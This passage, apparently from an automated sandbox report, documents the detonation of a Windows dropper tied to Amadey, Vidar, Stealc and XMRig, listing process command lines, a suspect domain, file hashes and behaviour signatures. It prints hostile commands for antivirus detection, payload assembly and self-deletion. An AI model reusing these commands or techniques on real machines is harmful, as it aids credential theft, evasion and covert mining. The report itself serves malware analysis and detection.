findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c md 150746

C:\Windows\SysWOW64\findstr.exe

findstr /V "reachedindicatingfindlawfu" Cologne

C:\Windows\SysWOW64\cmd.exe

cmd /c copy /b Abroad 150746\e

C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif

150746\Mind.pif 150746\e

C:\Windows\SysWOW64\timeout.exe

timeout 5

C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif

C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif

C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif

C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif" & rd /s /q "C:\ProgramData\ECGDHDHJEBGH" & exit

C:\Windows\SysWOW64\timeout.exe

timeout /t 10

Network

Country	Destination	Domain	Proto
US	8.8.8.8:53	WAmbXuXSzuXabiImZi.WAmbXuXSzuXabiImZi	udp
US	8.8.8.8:53	theemir.xyz	udp

Files

C:\Users\Admin\AppData\Local\Temp\Secretariat

MD5	7f01361524f94ccde5107595e2c54200
SHA1	c1b34c5781d2f042c81c3a8128d2a9d5b7b7a084
SHA256	903bedd93e8ec45d8083f33181b8f64612c075bfddf55fc4fb5a5443f5c578dd
SHA512	bb19216799526c5c7f2bf1f29e529d63c2cd6f6cef0c9e3b236a8e90d836a655d0eb7f62a9aa91dcf8f1c8d8f0ea9753252a5e54f49768315844847196dae064

C:\Users\Admin\AppData\Local\Temp\Cologne

MD5	a7e0c610d9e51e1f07ed50a2698d841c
SHA1	856bf97f63d5b1629a73def5b539454e2bdf0925
SHA256	4458046d4cefd31f95c9844044f68b7fc95311a5e25d085a2882c6426d07977d
SHA512	60ab445f726323b9ea37eb328015dbf752065f9091d4ef19ccdf3c567e0ae731ba633a78334e245b7b5219f1580ccf8dc7790084255ae8bf143a559cbf11adc6

C:\Users\Admin\AppData\Local\Temp\Race

MD5	677c8b24ad59b6eef5dfb3faf7e0974a
SHA1	6e52ce41957b616aff5481493c30b7d84090a562
SHA256	b2f80e63c5e1073731a4656fa3e6d23d6cb7dd43d70ebea566b6bee00fee9bfd
SHA512	e013f8d3bbe9ebbf25635efb17d3554056c8318af4908825820dab0393d4ac9a26de55e4f168ba0cc84294a657680887b74b59d2b15c340b9a990021f6269c7a

C:\Users\Admin\AppData\Local\Temp\Reasons

MD5	99f7825b887660ea8f043d913522545b
SHA1	f6d36f0385ec836a40572bfcf605c8905b1a600a
SHA256	61ca2c5de8554fd7afe374c06203ea7832fdfff03f6512ef637328c66a6091a9
SHA512	ff1b9ff9aecf55b35c817e49adc0f580a45875976c462d03984eba97f93d57650da7724b42c2105eac0579c865c204e776ef762d984600c7e96fc574ace28cd2

C:\Users\Admin\AppData\Local\Temp\Estates

MD5	e3b5843f44d2382246054ea8b0706383
SHA1	a3036166a029bb1975129896e091daf40d820999
SHA256	2a790ae2e21ecf6c83b670a22509aeeca5a3ba67698cdd534817ff6e49957a84
SHA512	eac7c2bc9bfa0ad36a112b0f6878af59f9d6644e5f98842f069e741165d48d5c393790d939725c2d11606609a63ba1983c60753c3c9c4c4c273d49788190e2f8

C:\Users\Admin\AppData\Local\Temp\Changed

MD5	a2d24d16e1b5a0972e95b39e1d9a251b
SHA1	a5f7c2bcbbffef058fafe1b62c3825ce26ea5ed6
SHA256	c56805d59fc6c67afb039850fb018d90ee11ccdbecf6f7db0880f0d29e5e2a07
SHA512	8203f0ca64e37f40c923216a09216387ba9e0ef35fac7b3df1b409216ae8b4b85fb178d0622482ce04ac1cba68af938c75272b31ca3a740a1061103785e4cfad

C:\Users\Admin\AppData\Local\Temp\Lake

MD5	5ef48073ad8953dbc25cb95852577d58
SHA1	da11413d729915a120e16e15c47201ad1afd7157
SHA256	30c013ba41821acae05a5359ce75857ca66cdb03adf4560c6c0aaf2eff7b19a8
SHA512	172afe33b31994af02e8e3d13ca5a285d8869671d00fecd8e147dde26eb8e493cafbae9a60f6ef49eac8221a0e1176e625043539b2b321a934647539ae22d00d

C:\Users\Admin\AppData\Local\Temp\Timeline

MD5	3876d86dce4359c2e28a693d2c24577f
SHA1	373222b9a4d6f9116feac281725156f024a464fc
SHA256	30286f45ff66b72cc1a5c493442f5c57c0f2c7d729f663793c57c3b8dba4cf4d
SHA512	9289622b7e57f1ce380d41073ab42dc4376d3c156d8b82f60d166650a138c6190cf98ae35002ae11f5b31926dd92f3de3724d77f9e4ed2427151794a9b03fe7e

C:\Users\Admin\AppData\Local\Temp\Then

MD5	33271f00b044ed98071d84807c2158c8
SHA1	392e6351a844de7b50be3486db834321f625b7e1
SHA256	eaab5d35bea196961ffb36b423caed9d42a6cdf723759a67d5c865db6d906eb1
SHA512	0cc39c715573a5b2e81621e83dcdaa09b29530e044be223e0b62913aa77940f196429845fca46e0838781eecd6accacb7083b95bccf60f9f3fff37d096f8a788

C:\Users\Admin\AppData\Local\Temp\Fx

MD5	dfedbc594137615c08a79052a8f79e4b
SHA1	164812d22a6559b86883089a2b5b3cb2d97c320f
SHA256	7e2d5e98eefd6cc1fa44a4dda125c2d986ff0bd6b6af488213bc4992d3d6ee6e
SHA512	0ebd7c128464eaae4ba196a45201c646e669021f7a2005aa04471b521373474cc3dd8df55792585fd92bdbd6297a0fb31af18e72111fd8aa3bf39113bcb29235

C:\Users\Admin\AppData\Local\Temp\Vintage

MD5	278bae85379affaab937d9ec59eaa46d
SHA1	badcf501ff87624a68efb1ec3340d6314cc00027
SHA256	ae74ce2e63b5570786913b7f18c8bb79cd3f89d8a944a308ab036b39d7904edc
SHA512	9bfc82782f6318d4176f7fa7adad68d44421c76c179f5777e739f837d9ba5300453fbd9a1368eccbeccc24da9d1700db81f2128fde49547ed2ca86f1824ad391

C:\Users\Admin\AppData\Local\Temp\Destiny

MD5	ae51ee350f9b67d464fef7951cefe7ef
SHA1	109023e02149e2282322d285c00810a1cef0e3de
SHA256	658b597ecc79cf8cae6883b1bd37c014da410731d9ec9774b2952e8d9041793e
SHA512	bf84d806d2c10b331af8a195b654eaf7049c252db9120f72aff28cf263727b88fb432bb05f911afca7509c485f8df5b1c162ec91e4b88c76f0c19eb99f080f99

C:\Users\Admin\AppData\Local\Temp\Fighting

MD5	4a5d107b42961c4cc01ff0699b64629a
SHA1	6c31783eb1a0cf760515c21b2218f905f387c3cc
SHA256	04929738eb9987535c773a0ad904049369bc81fa6e36a35d3ff38e26d53cd696
SHA512	57dc197b44971214b61942b019609011c699f7f22972660e7f5d37e7e5cd2102501ae5d5f7b6e9031074cf9a730fbc8f128340dc640344996d0d34886f1e6b72

C:\Users\Admin\AppData\Local\Temp\Overnight

MD5	fb39a9bcb79f50bd7cd171f3c9325b96
SHA1	922d750974483d7ae4e40d873b1124835d6a865a
SHA256	04d5051668e69769a85b314d0c46556755dd11182c2982c5fac2792d62f152c0
SHA512	fe2ebb8412e8df722c0f8fd8682198654ad19707525f8bf2068d18104163e809621fef079f8f2cb6176e9897a764816144187c2b6214d2406e6a30e581d556d7

C:\Users\Admin\AppData\Local\Temp\Travelling

MD5	528985f09d3b53a80e38911b2086f45b
SHA1	8c2c8183f0883132dfe3d61a8afa5726cec9fefa
SHA256	79b144d737cbb862203146276c32deddcee0dcbe726cc877f40f0b0348a7f502
SHA512	1e661cf38f15abd8a852c01a1605eb19da137d8fb738885c72853c624066f1350cdb98205d3ed29ae286f4463dff2dca2881dddef8f7ac3ac6a9a017d8e7e842

C:\Users\Admin\AppData\Local\Temp\Flyer

MD5	9aec66d230b5a002f8e58e7c86fd5d11
SHA1	4486447e1c450f4c687ccef10433c428dd3e31d4
SHA256	0c8303cb00fe2838fbc27ffd8af0a0fc00045ce54efa40911b50f4e828edf1d6
SHA512	752119a11a7440a63602e77fa229d741078e3117b6e461b0d383a23f5059d0aef7b629eaf90abf5f2522997d0abab06e81bf258e8f823c22ce832fdb737e1fcc

C:\Users\Admin\AppData\Local\Temp\Lol

MD5	ac4c86188160adc4ea28ea1505dc18bb
SHA1	7e22e3f0d2d0aa2235b613df0413a73324dff760
SHA256	8d73e871d375f3802510b5212aba0e8ef929d62ed0396367cd3838ca7494b5b5
SHA512	a4ff143709eaddd00cd1062c940d051606039657722cc0944886a59282b8eaafed47004dcb90bf315f53acedfbdb93935fc49c2d2cf674870211854ca10b2692

C:\Users\Admin\AppData\Local\Temp\Worry

MD5	c715434dab2f93f0d1b6680c2b01b3fc
SHA1	355ea26f3a52b2c9abb457b9c56177a229cf9421
SHA256	05ddf26b6a74f039743ffd1d4d6152b8aa0add24da17aece71f9ccaa60538c4c
SHA512	7d39bf5a5362dd4d7ee51f4c963eb55cfdd3da46db093e288cec3db71c8b1bfaa304a64e539524fb62c397cd0a27c0890f3c93db4b591a84360bd47f23bfbc6a

C:\Users\Admin\AppData\Local\Temp\Impacts

MD5	315afae2384177766854966d0c39ead0
SHA1	baa183ea390760a631723c2f1494e0af8fb391e0
SHA256	229d27cf367f7844bdc9da75bcffc7c68a8b71aa1a31dd819f5ee4fe3bc42767
SHA512	384d2d0926af3ac4355461dd01e248d82b7f55a1a851d18c5ba892ba987472c13e8036e9e1a11806c8501595d19bc753290121903aa51d345af62381f6b815ab

C:\Users\Admin\AppData\Local\Temp\Fails

MD5	723321b7b3b33a2788e6cc0ba336c76d
SHA1	e17eb7189561d7f8b4fab76014124b780a3da4d7
SHA256	db1674bcd78442305a1a79773d17b61a6c5bbf830ce8e4983164c1f56198236a
SHA512	dd3c229f3b36cb07222663b8becac13df8d3a68874aee73ad20b11e18591085664ff9df27e9d84d9e9eedc00cc206db975049650f37d11bb666f1d690029c35e

C:\Users\Admin\AppData\Local\Temp\Therefore

MD5	cc32e2964f235bf9bddd71d4f7d3a9e2
SHA1	a570733cfce8d135315e86473b0ac6f6b4a4e763
SHA256	ec7c44500d11213688b83a04fb95c52b0d2c3ed2cc28d8d7e604f5b9336852f4
SHA512	3c3bea9699b4904e949c71ea40e72f39824837a9ed5251d1e1b5b857642bb2d6816c5d125255bb9272f599dd14d594fa820dacf22e8f72df424a419942e9ff8b

C:\Users\Admin\AppData\Local\Temp\Venezuela

MD5	47d9d9cdad725675c2dfa55ed4717db6
SHA1	d7bc49f9fae903accddf2da620dc5b9668f35dce
SHA256	d4be1b5210a95583cc8617ab58b5947b46abaf4f000960abcc774eee20751210
SHA512	4e12b065fc581460d137a0aebdffd3d56cfaf82b4d8be81bdfc3d4daf0897eda2230ab05166b35928b0b3c2f2cf0fb751ace6109b400d107a89797fefb5cf34e

C:\Users\Admin\AppData\Local\Temp\Ensures

MD5	5abe66470ddba2d1adc1ea359fb58b7d
SHA1	b914707d1f1b1c16dc03470cd8737a889292796c
SHA256	fecefcaab4d2499057061a01c13c3ec834ec4fcf13188e8708ad33cc3a6c6cb8
SHA512	5f95116f3f91ce9ed5d084e2c7b9df62892a633b3f45c3b714be8c34d39258d401e189297e49e15e8f497b88c2677f089473cd60e2e4806647fb7fc83471c0e2

C:\Users\Admin\AppData\Local\Temp\Noticed

MD5	90ab924a6bc6d90d922308452ce5c128
SHA1	4fd74c170817b9685b9230625fe7e47d54473829
SHA256	2ebfcd2eeaf8bc9561a1310ddc51e8759859e6523d0e8c73bb06969368ef88b2
SHA512	e93e506184d2b57abeb9601968bb0f53a06f78e8d08d3a5b5fd9f8b56a1e8709b2a48d3372e0a5d5152902a294c3b201176b35f60f7d4ee2636e15e0ca99b740

C:\Users\Admin\AppData\Local\Temp\Controversial

MD5	b8d54a8f7a866ce5950c2c67b18343ee
SHA1	95f12fbd6244ea3ecee9795ebd984a97bd056ef7
SHA256	8205f767c8dd7bb85316fe3f1988225c4bab822b39c03c412473f63f7fadddae
SHA512	1679d376069aab604f9c483623f1f7d53ca3792fa6dddb214360690186ec39662807149a7e525d797ee89d80bf742fb51a59beb0e053c4187b661bd8c954a164

C:\Users\Admin\AppData\Local\Temp\Expects

MD5	f9c59716c76e0d9aea1ed33432d0c0eb
SHA1	e017af5635025c7a5dddd5879e19f0e56cee5f63
SHA256	26deadb528299fc9567030e170fd608190da63a2cc0b8869565e4706329aee9b
SHA512	c24d790ae2ce1a66a5c9fd7eb15317cc25a2e16d28996eab7b46bea52b842ae20fcfc934edad5b70d8a0b66350db587057f346ca534e4b97fbb805693c6def61

C:\Users\Admin\AppData\Local\Temp\Banners

MD5	3f96912bd26122377de90bdf2b2adb43
SHA1	355135ae39c67bc1e8a34962db066b2d4862df22
SHA256	1025adb658535b34a6b1b162708f1d829e332bf7dfda6e389c5b676d2057b881
SHA512	6942ce7a6a09eaa4e4f897935d472d8a50cdc822d820e978eba449207ae42b65c86f5374226e4c1957ef9f8a7b3c26dfcdf45ec69edae9ce51173a0822c08174

C:\Users\Admin\AppData\Local\Temp\Tactics

MD5	2c9654e874efe5146131ed5422a715d9
SHA1	0e6d5c61f2b4821da4ecedd2a59eb6b023daa0e3
SHA256	2b35604cd27e82644be51f3266054f35b2415dd65abaa7b9b34f329fa14038e6
SHA512	bfba8ba24bc24899718d2d0b1f8948c1899c41b00624493bbd9a7c253cdee44a0f6e28d5db33473dafc3dbe6367fbdca2c062ea9cf21a15ef7ea53de8ce71c05

C:\Users\Admin\AppData\Local\Temp\Exception

MD5	2b79f9677d8663ccff67fbe4677a5065
SHA1	f63cbee04c6ae82b0f9ebaeeed8fbce7be51e7ed
SHA256	7b70774cca90f24dc9e1b889b6e277961ed7b61ed4cd8dbdd4642c65cb9b1ba9
SHA512	ce31599996e45e5aeb04b7d51e510711303471e85520986c91c4eac61a843c3d8e2b70851a1a6df0bf4b0825d417ac0b1b70822e93ab8f9523414effbef93619

C:\Users\Admin\AppData\Local\Temp\Voice

MD5	c01790f3cef20061f828578069162760
SHA1	72a450b13fd37f6c5c95d94240c51354316d5962
SHA256	328d81768d3cb94a93c1d689ed4b571753d59309f44954e83ee9d3966369325b
SHA512	4350a43ddef179c199ea55acba477b57490f2434eb45cea9b3f9ebca9f4b3615c41bc38f19570bd2a1188fecc472c5406ef2d1637b16a55deb5814ab2b785fab

C:\Users\Admin\AppData\Local\Temp\Abroad

MD5	6d4062e0f673dbe0a06ec227fe515c62
SHA1	c35c0ed445442d405ccfc78a20bbb86cf97526f6
SHA256	4e1c30452e317b04199626e8b7ca7f3b2c0c6b275715b1832533fcec030b72f4
SHA512	df953dbdb117c7ef3dbfcd266dee839f9a1ca4d50924f86d9620d0ca7a7fc9e3059caa955251e2327d46571ceb0b79dc53a2fef5b4b4f829ba33c436f982a921

C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif

MD5	b06e67f9767e5023892d9698703ad098
SHA1	acc07666f4c1d4461d3e1c263cf6a194a8dd1544
SHA256	8498900e57a490404e7ec4d8159bee29aed5852ae88bd484141780eaadb727bb
SHA512	7972c78acebdd86c57d879c12cb407120155a24a52fda23ddb7d9e181dd59dac1eb74f327817adbc364d37c8dc704f8236f3539b4d3ee5a022814924a1616943

memory/2632-212-0x0000000001000000-0x000000000174A000-memory.dmp

memory/2632-213-0x0000000001000000-0x000000000174A000-memory.dmp

memory/2632-215-0x0000000001000000-0x000000000174A000-memory.dmp

memory/2632-216-0x0000000001000000-0x000000000174A000-memory.dmp

memory/2632-217-0x0000000001000000-0x000000000174A000-memory.dmp

memory/2632-218-0x0000000061E00000-0x0000000061EF3000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-06-14 12:36

Reported

2024-06-14 12:40

Platform

win11-20240611-en

Max time kernel

150s

Max time network

155s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

Detect Vidar Stealer

stealer

Description	Indicator	Process	Target
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A

Stealc

stealer stealc

Suspicious use of NtCreateUserProcessOtherParentProcess

Description	Indicator	Process	Target
PID 3524 created 3268	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	C:\Windows\Explorer.EXE

Vidar

stealer vidar

xmrig

miner xmrig

XMRig Miner payload

miner

Description	Indicator	Process	Target
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A

Blocklisted process makes network request

Description	Indicator	Process	Target
N/A	N/A	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	N/A

Executes dropped EXE

Description	Indicator	Process	Target
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	N/A
N/A	N/A	C:\ProgramData\JKKEBGCGHI.exe	N/A
N/A	N/A	C:\ProgramData\CBGCBGCAFI.exe	N/A

Loads dropped DLL

Description	Indicator	Process	Target
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx

Description	Indicator	Process	Target
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Checks installed software on the system

discovery

Suspicious use of SetThreadContext

Description	Indicator	Process	Target
PID 3524 set thread context of 2820	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif
PID 2952 set thread context of 4924	N/A	C:\ProgramData\JKKEBGCGHI.exe	C:\Windows\SysWOW64\ftp.exe
PID 5112 set thread context of 2352	N/A	C:\ProgramData\CBGCBGCAFI.exe	C:\Windows\SysWOW64\ftp.exe
PID 2352 set thread context of 4024	N/A	C:\Windows\SysWOW64\ftp.exe	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
PID 4024 set thread context of 2608	N/A	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe

Drops file in Windows directory

Description	Indicator	Process	Target
File created	C:\Windows\Tasks\Watcher Com SH.job	C:\Windows\SysWOW64\ftp.exe	N/A
File created	C:\Windows\Tasks\TWI Cloud Host.job	C:\Windows\SysWOW64\ftp.exe	N/A

Command and Scripting Interpreter: PowerShell

execution

Description	Indicator	Process	Target
N/A	N/A	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	N/A

Enumerates physical storage devices

Checks processor information in registry

Description	Indicator	Process	Target
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	N/A

Delays execution with timeout.exe

evasion

Description	Indicator	Process	Target
N/A	N/A	C:\Windows\SysWOW64\timeout.exe	N/A
N/A	N/A	C:\Windows\SysWOW64\timeout.exe	N/A

Enumerates processes with tasklist

Description	Indicator	Process	Target
N/A	N/A	C:\Windows\SysWOW64\tasklist.exe	N/A
N/A	N/A	C:\Windows\SysWOW64\tasklist.exe	N/A

Suspicious behavior: EnumeratesProcesses

Description	Indicator	Process	Target
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	N/A
N/A	N/A	C:\ProgramData\JKKEBGCGHI.exe	N/A
N/A	N/A	C:\ProgramData\CBGCBGCAFI.exe	N/A
N/A	N/A	C:\ProgramData\JKKEBGCGHI.exe	N/A
N/A	N/A	C:\ProgramData\CBGCBGCAFI.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	N/A
N/A	N/A	C:\Windows\SysWOW64\ftp.exe	N/A
N/A	N/A	C:\Windows\SysWOW64\ftp.exe	N/A
N/A	N/A	C:\Windows\SysWOW64\ftp.exe	N/A
N/A	N/A	C:\Windows\SysWOW64\ftp.exe	N/A
N/A	N/A	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	N/A
N/A	N/A	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	N/A

Suspicious behavior: MapViewOfSection

Description	Indicator	Process	Target
N/A	N/A	C:\ProgramData\JKKEBGCGHI.exe	N/A
N/A	N/A	C:\ProgramData\CBGCBGCAFI.exe	N/A
N/A	N/A	C:\Windows\SysWOW64\ftp.exe	N/A
N/A	N/A	C:\Windows\SysWOW64\ftp.exe	N/A
N/A	N/A	C:\Windows\SysWOW64\ftp.exe	N/A

Suspicious use of AdjustPrivilegeToken

Description	Indicator	Process	Target
Token: SeDebugPrivilege	N/A	C:\Windows\SysWOW64\tasklist.exe	N/A
Token: SeDebugPrivilege	N/A	C:\Windows\SysWOW64\tasklist.exe	N/A
Token: SeDebugPrivilege	N/A	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	N/A
Token: SeLockMemoryPrivilege	N/A	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe	N/A
Token: SeLockMemoryPrivilege	N/A	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe	N/A
Token: SeDebugPrivilege	N/A	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	N/A

Suspicious use of FindShellTrayWindow

Description	Indicator	Process	Target
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	N/A
N/A	N/A	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe	N/A

Suspicious use of SendNotifyMessage

Description	Indicator	Process	Target
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	N/A

Suspicious use of WriteProcessMemory

Description	Indicator	Process	Target
PID 2096 wrote to memory of 3292	N/A	C:\Users\Admin\AppData\Local\Temp\Setup (10).exe	C:\Windows\SysWOW64\cmd.exe
PID 2096 wrote to memory of 3292	N/A	C:\Users\Admin\AppData\Local\Temp\Setup (10).exe	C:\Windows\SysWOW64\cmd.exe
PID 2096 wrote to memory of 3292	N/A	C:\Users\Admin\AppData\Local\Temp\Setup (10).exe	C:\Windows\SysWOW64\cmd.exe
PID 3292 wrote to memory of 1520	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Windows\SysWOW64\tasklist.exe
PID 3292 wrote to memory of 1520	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Windows\SysWOW64\tasklist.exe
PID 3292 wrote to memory of 1520	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Windows\SysWOW64\tasklist.exe
PID 3292 wrote to memory of 2072	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Windows\SysWOW64\findstr.exe
PID 3292 wrote to memory of 2072	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Windows\SysWOW64\findstr.exe
PID 3292 wrote to memory of 2072	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Windows\SysWOW64\findstr.exe
PID 3292 wrote to memory of 3432	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Windows\SysWOW64\tasklist.exe
PID 3292 wrote to memory of 3432	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Windows\SysWOW64\tasklist.exe
PID 3292 wrote to memory of 3432	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Windows\SysWOW64\tasklist.exe
PID 3292 wrote to memory of 2020	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Windows\SysWOW64\findstr.exe
PID 3292 wrote to memory of 2020	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Windows\SysWOW64\findstr.exe
PID 3292 wrote to memory of 2020	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Windows\SysWOW64\findstr.exe
PID 3292 wrote to memory of 4272	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Windows\SysWOW64\cmd.exe
PID 3292 wrote to memory of 4272	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Windows\SysWOW64\cmd.exe
PID 3292 wrote to memory of 4272	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Windows\SysWOW64\cmd.exe
PID 3292 wrote to memory of 3136	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Windows\SysWOW64\findstr.exe
PID 3292 wrote to memory of 3136	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Windows\SysWOW64\findstr.exe
PID 3292 wrote to memory of 3136	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Windows\SysWOW64\findstr.exe
PID 3292 wrote to memory of 792	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Windows\SysWOW64\cmd.exe
PID 3292 wrote to memory of 792	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Windows\SysWOW64\cmd.exe
PID 3292 wrote to memory of 792	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Windows\SysWOW64\cmd.exe
PID 3292 wrote to memory of 3524	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif
PID 3292 wrote to memory of 3524	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif
PID 3292 wrote to memory of 3524	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif
PID 3292 wrote to memory of 2280	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Windows\SysWOW64\timeout.exe
PID 3292 wrote to memory of 2280	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Windows\SysWOW64\timeout.exe
PID 3292 wrote to memory of 2280	N/A	C:\Windows\SysWOW64\cmd.exe	C:\Windows\SysWOW64\timeout.exe
PID 3524 wrote to memory of 2820	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif
PID 3524 wrote to memory of 2820	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif
PID 3524 wrote to memory of 2820	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif
PID 3524 wrote to memory of 2820	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif
PID 3524 wrote to memory of 2820	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif
PID 2820 wrote to memory of 2952	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	C:\ProgramData\JKKEBGCGHI.exe
PID 2820 wrote to memory of 2952	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	C:\ProgramData\JKKEBGCGHI.exe
PID 2820 wrote to memory of 2952	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	C:\ProgramData\JKKEBGCGHI.exe
PID 2820 wrote to memory of 5112	N/A	C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif	C:\ProgramData\CBGCBGCAFI.exe
